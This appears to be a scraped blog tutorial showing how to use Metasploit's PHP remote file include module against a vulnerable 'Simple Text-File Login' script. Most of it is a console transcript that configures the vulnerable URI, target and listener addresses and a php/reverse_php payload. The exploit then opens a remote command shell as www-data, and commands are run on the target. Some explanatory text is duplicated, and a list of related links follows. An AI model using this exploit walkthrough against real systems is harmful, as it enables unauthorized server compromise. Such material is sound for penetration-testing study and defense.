Using the Metasploit PHP Remote File Include Module
2010-07-23 21:15
1556 查看
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:
and make your PHPURI
let's see it in action
Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include [*] Searching loaded modules for pattern 'php_include'... Exploits ======== Name Rank Description ---- ---- ----------- unix/webapp/php_include excellent PHP Remote File Include Generic Exploit msf > use exploit/unix/webapp/php_include msf exploit(php_include) > info Name: PHP Remote File Include Generic Exploit Version: 8762 Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: hdm egypt Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload information: Space: 32768 Description: This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX msf exploit(php_include) > set PATH /1/ PATH => /1/ msf exploit(php_include) > set RHOST 192.168.6.68 RHOST => 192.168.6.68 msf exploit(php_include) > set RPORT 8899 RPORT => 8899 msf exploit(php_include) > set PAYLOAD php/reverse_php PAYLOAD => php/reverse_php msf exploit(php_include) > set LHOST 192.168.6.140 LHOST => 192.168.6.140 msf exploit(php_include) > exploit [*] Started bind handler [*] Using URL: http://192.168.6.140:8080/RvSIqhdft [*] PHP include server started. [*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30 %38%30%2f%52%76%53%49%71%68%64%66%74%3f [*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010 dir 0.jpeg header.inc.php license.txt slog_users.txt version.txt 1.jpeg index.asp old slogin.inc.php adminlog.php install.txt readme.txt slogin_genpass.php footer.inc.php launch.asp slog_users.php slogin_lib.inc.php id uid=33(www-data) gid=33(www-data) groups=33(www-data)
相关文章推荐
- Using the Metasploit PHP Remote File Include Module
- FileMaker Web Publishing: A Complete Guide to Using the API for PHP
- OpenCV_Tutorials——CORE MODULE.THE CORE FUNCTIONALITY—— File Input and Output using XML and YAML files
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- PHP的readfile函数和file_get_contents函数错误: Unable to find the wrapper "https"
- How to handle crash problem?(2.Finding crash information using the MAP file 2)
- ERROR: Unable to launch the RTL Schematic process. The input NGR file, Can not fnd the module的解决方法
- Reading the contents of a file using POSIX functions
- php编译错误Note that the MySQL client library is not bundled anymore或者cannot find mysql header file
- How to know if file is complete on the server using FTP
- Writing Images to the Excel Sheet using PHPExcel--转载
- Git: untrack a file in local repo only and keep it in the remote repo
- Finding crash information using the MAP file 2
- 今天遇到一个问题,很纠结include(authenticate.php): failed to open stream: No such file or directory
- linux下安装PHP的CI框架,出现Your view folder path does not appear to be set correctly. Please open the following file and correct this: i
- Uploading files in Flex using the FileReference class
- php URL file-access is disabled in the server configuration
- Generate the java class from XML Schema file using JAXB
- GetModuleFileName False failed with error 126 (The specified module could not be found)